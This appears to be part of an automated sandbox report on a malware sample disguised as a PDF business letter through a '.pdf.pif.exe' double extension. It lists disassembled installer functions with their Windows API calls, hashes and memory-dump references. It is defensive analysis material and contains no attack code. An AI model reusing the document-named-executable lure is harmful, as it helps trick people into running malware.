                                                                                      Similarity
                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 1148316912-0
                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                      Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 1849352358-0
                                                                                      • Opcode ID: b077c55196b787e2a8ff73e17149a28d7dbc02641dbf6875117b3fdd70260e1c
                                                                                      • Instruction ID: 44b403d8ea142f61c46f59bdf5c6715f811f2d25bbd76591197da0c88fd97a40
                                                                                      • Opcode Fuzzy Hash: b077c55196b787e2a8ff73e17149a28d7dbc02641dbf6875117b3fdd70260e1c
                                                                                      • Instruction Fuzzy Hash: 97F0E1B2600505BFD701DBA4EF88DDE7BBCEB08351F101465F642F1190CA749D418B38
                                                                                      Function 004047DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 0040486F
                                                                                      • wsprintfW.USER32 ref: 00404878
                                                                                      • SetDlgItemTextW.USER32(?,0042D1F8), ref: 0040488B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s
                                                                                      • API String ID: 3540041739-3551169577
                                                                                      • Opcode ID: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                                                      • Instruction ID: 9325b392590c5ef976e2008094ad60f82e4542d9ead9839402a3ec0ae1c12cd4
                                                                                      • Opcode Fuzzy Hash: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                                                      • Instruction Fuzzy Hash: F01126336002243BDB10666D9C4AEEF3699DFC2335F144637FA25F60D0D979881186E8
                                                                                      Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                                                      • Instruction ID: cdd208a87cf377e151b028b5bc2daf4d5ae5f0581749dcda0b9a9113f5b0b00f
                                                                                      • Opcode Fuzzy Hash: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                                                      • Instruction Fuzzy Hash: 35216271A44109AFDF01AFB0DA4AAAE7A75EF44744F14403EF502B61D1DAB88590DB58
                                                                                      Function 004057AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004057B4
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004057BE
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 004057D0
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-3081826266
                                                                                      • Opcode ID: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                                                      • Instruction ID: d5080c12e7ff52c275ddc2bb7fa08cb5908483c46ce1eaa0ff7902437740b8fb
                                                                                      • Opcode Fuzzy Hash: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                                                      • Instruction Fuzzy Hash: 6ED05E31101E20AAC1116B549C08EDF66ACEE45300740802BF141B30A1D7781D418AFD
                                                                                      Function 00402C9B Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,00402E7B,00000001,?,?,?,00000000,004033FE,?), ref: 00402CAE
                                                                                      • GetTickCount.KERNEL32 ref: 00402CCC
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C15,00000000), ref: 00402CE9
                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004033FE,?), ref: 00402CF7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                                                      • Instruction ID: 286efe5820fb8a572a90530028cebd71549732c65272ed0b190b82beaa7bbda7
                                                                                      • Opcode Fuzzy Hash: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                                                      • Instruction Fuzzy Hash: 6CF05E70606620BFD7216B24FF4D98F7A64F744B11B91043AF141B11E4C7B448C18BDC
                                                                                      Function 00404F6E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00404F9D
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00404FEE
                                                                                        • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                                      • Instruction ID: 5368250be3cb6e4106e80ca770201d47c576881e659a98db37bb9bc21f5752cc
                                                                                      • Opcode Fuzzy Hash: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                                                      • Instruction Fuzzy Hash: 1A0184B150020AAFDF219F11DD81EAB3766EBC5755F104037FB00761D1CB7A8D62D669
                                                                                      Function 00403685 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,0040365D,0040349F,?), ref: 0040369F
                                                                                      • GlobalFree.KERNEL32(?), ref: 004036A6
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403697
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-3081826266
                                                                                      • Opcode ID: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                                      • Instruction ID: 198638f61427fefc2148c68e53f1161767bd25bd987848fccacf8e5b1a1d3e49
                                                                                      • Opcode Fuzzy Hash: af6bb57c9087681c5df9a6583299814f0cea52fc49ac98f0490cfdd2588b3981
                                                                                      • Instruction Fuzzy Hash: C1E08C3250112067CA315F65E90472AB76CAF4AB22F05442AE8807B36087745C534BC8
                                                                                      Function 004057FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00405800
                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D6B,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE), ref: 00405810
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-224404859
                                                                                      • Opcode ID: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                                                      • Instruction ID: 957e04025a41c1941cffb014cac20df3e0ff5def3477a48c76d927f6f21090a4
                                                                                      • Opcode Fuzzy Hash: cb74b58fbf665d9c84b1068e3f9d72a75ce1c9c55f4980f1e918d92df7a9c5c8
                                                                                      • Instruction Fuzzy Hash: EED05EB3411D209AD3127B04DC04A9F67ACFF51300746846AE841A61A1D7B85C908AEC
                                                                                      Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                        • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1962777342.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1962748581.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962799990.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1962840643.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloclstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 852173138-0
                                                                                      • Opcode ID: efa50b43e91c1ccc28343189545b65b5cdd8b9049b59fb06d3163fa2f9196ea5
                                                                                      • Instruction ID: dfa8033d91bdbc1ecc465c3c8a87416c6933f1b99adadbc21e28f794a1617889
                                                                                      • Opcode Fuzzy Hash: efa50b43e91c1ccc28343189545b65b5cdd8b9049b59fb06d3163fa2f9196ea5
                                                                                      • Instruction Fuzzy Hash: 87318FF69042119BF314CF64DC85AEAB7E8EB842D0B124529FB41E726CEB34E8018765
                                                                                      Function 00405934 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 0040595C
                                                                                      • CharNextA.USER32(?,?,00000000,00405B51,00000000,[Rename]), ref: 0040596D
                                                                                      • lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                                      • Instruction ID: d765cdcf26b5ece385e96dcd0ac43345a120d35f2bfa0d6b32256e58560247d7
                                                                                      • Opcode Fuzzy Hash: 8032f475193f702fb71f6f03d8a24b737fcdd57b3ef24890a40e5d8249ef00b0
                                                                                      • Instruction Fuzzy Hash: 60F09632504918FFC7129FA5DD00D9FBBA8EF163A4B2540BAE841F7211D674DE019F59

                                                                                      Execution Graph

                                                                                      Execution Coverage:0%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:100%
                                                                                      Total number of Nodes:1
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 77320 32fd2c70 LdrInitializeThunk

                                                                                      Executed Functions

                                                                                      Function 32FD35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2 32fd35c0-32fd35cc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7ab65ac75af0fe10b1553cf8f15bb03f51bf22ecdebc2b0626352aaba4deeba1
                                                                                      • Instruction ID: c6db05a453452f4e03e036675f053e093d66bb2f32cd770b513382c3b4bc44ec
                                                                                      • Opcode Fuzzy Hash: 7ab65ac75af0fe10b1553cf8f15bb03f51bf22ecdebc2b0626352aaba4deeba1
                                                                                      • Instruction Fuzzy Hash: C890023160550413D10171589614706100547D0601F65C812A1434529D87958A5565E3
                                                                                      Function 32FD2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 32fd2c70-32fd2c7c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 9e8c236439b3d931aa8c0fdf2795b6d669bb262c4e219049a1da9c8ab8069114
                                                                                      • Instruction ID: a46c053aff0279250125e96f1630116a0f3db6d13db7a1921675324196f24d47
                                                                                      • Opcode Fuzzy Hash: 9e8c236439b3d931aa8c0fdf2795b6d669bb262c4e219049a1da9c8ab8069114
                                                                                      • Instruction Fuzzy Hash: 3F90023120148813D1117158D50474A000547D0701F59C812A5434619D869589957162
                                                                                      Function 32FD2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1 32fd2df0-32fd2dfc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
